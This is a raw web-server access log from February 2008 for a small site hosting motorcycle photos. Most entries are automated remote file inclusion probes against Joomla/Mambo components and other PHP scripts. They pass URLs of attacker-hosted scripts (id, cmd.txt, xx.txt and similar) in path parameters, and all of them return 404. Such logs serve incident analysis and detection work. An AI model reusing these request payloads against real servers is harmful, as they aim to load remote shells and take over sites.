211.233.7.68 - - [19/Feb/2008:05:21:16 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:21:28 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:21:32 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:21:32 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:21:35 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:21:41 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:21:41 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:21:42 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:22:15 -0800] "GET //shop/admin.php?link=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:22:16 -0800] "GET /logs//shop/admin.php?link=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:22:30 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:22:36 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:22:37 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:22:38 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:49 -0800] "GET /logs/access_071230.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:49 -0800] "GET /logs/access_071230.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:50 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:50 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:51 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:22:51 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:22:54 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:23:00 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:23:03 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:23:04 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:23:05 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:23:05 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:23:19 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:23:56 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:23:59 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:05:24:30 -0800] "GET /logs/access_071225.log//errors.php?error=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:24:41 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:24:46 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:24:59 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:25:01 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:25:05 -0800] "GET /logs/homepage.php?sel=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:25:08 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:25:10 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:25:13 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:25:15 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:25:15 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:05:25:17 -0800] "GET /homepage.php?sel=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:25:22 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:05:25:32 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:05:25:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:05:26:00 -0800] "GET /homepage.php?sel=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:05:26:00 -0800] "GET /logs/homepage.php?sel=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:05:26:09 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:26:29 -0800] "GET //skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:26:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:26:32 -0800] "GET //skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:26:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.expresszoo.se/Connections/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [19/Feb/2008:05:26:52 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:27:21 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:27:21 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:27:21 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:23 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 200 257277 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:23 -0800] "GET /bikes/dteel/2008_02_15/IMG_4501s.JPG HTTP/1.1" 200 323465 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:23 -0800] "GET /bikes/dteel/2008_02_15/IMG_4519s.JPG HTTP/1.1" 200 208989 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:24 -0800] "GET /bikes/dteel/2008_02_15/IMG_4516s.JPG HTTP/1.1" 200 328645 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:24 -0800] "GET /bikes/dteel/2008_02_16/IMG_4524s.JPG HTTP/1.1" 200 229589 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:24 -0800] "GET /bikes/dteel/2008_02_15/IMG_4522s.JPG HTTP/1.1" 200 292217 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:25 -0800] "GET /bikes/dteel/2008_02_16/IMG_4536s.JPG HTTP/1.1" 200 85494 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:25 -0800] "GET /bikes/dteel/2008_02_16/IMG_4525s.JPG HTTP/1.1" 200 275808 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:25 -0800] "GET /bikes/dteel/2008_02_16/IMG_4527s.JPG HTTP/1.1" 200 327693 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:25 -0800] "GET /bikes/dteel/2008_02_16/IMG_4557s.JPG HTTP/1.1" 200 232435 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.208.187.75 - - [19/Feb/2008:05:27:26 -0800] "GET /bikes/dteel/2008_02_16/IMG_4547s.JPG HTTP/1.1" 200 300279 "http://www.st-owners.com/forums/showthread.php?p=390066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:27:41 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.252.85 - - [19/Feb/2008:05:27:42 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:27:48 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:27:59 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:27:59 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:28:00 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:05 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:11 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:11 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:11 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:13 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:28:18 -0800] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:28:18 -0800] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:28:18 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:28:18 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:19 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:19 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:28:19 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:28:59 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:29:06 -0800] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [19/Feb/2008:05:29:07 -0800] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:29:33 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:29:35 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:29:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:29:36 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:29:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:29:37 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:29:45 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
